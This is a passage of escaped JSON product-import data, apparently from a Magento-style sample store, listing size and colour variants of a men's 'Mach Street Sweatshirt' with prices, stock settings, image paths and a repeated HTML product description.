LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"152\":{\"sku\":\"MH10-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -M-Red\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"153\":{\"sku\":\"MH10-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -L-Black\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"154\":{\"sku\":\"MH10-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -L-Blue\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"155\":{\"sku\":\"MH10-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -L-Red\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"156\":{\"sku\":\"MH10-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XL-Black\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"157\":{\"sku\":\"MH10-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XL-Blue\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh10-blue_alt1.jpg,\\/m\\/h\\/mh10-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"158\":{\"sku\":\"MH10-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt -XL-Red\",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mach-street-sweatshirt-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh10-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"159\":{\"sku\":\"MH10\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Mach Street Sweatshirt \",\"description\":\"<p>From hard streets to asphalt track, the Mach Street Sweatshirt holds up to wear and wind and rain. An infusion of performance and stylish comfort, with moisture-wicking LumaTech&trade; fabric, it\'s bound to become an everyday part of your active lifestyle<\\/p>\\n<p>&bull; Navy heather crewneck sweatshirt.<br \\/>&bull; LumaTech&trade; moisture-wicking fabric.<br \\/>&bull; Antimicrobial, odor-resistant.<br \\/>&bull; Zip hand pockets.<br \\/>&bull; Chafe-resistant flatlock seams.<br \\/>&bull; Rib-knit cuffs and hem.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"62\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh10-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Wool|LumaTech&trade;,pattern=Solid,climate=All-weather|Cool|Indoor|Spring,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_ca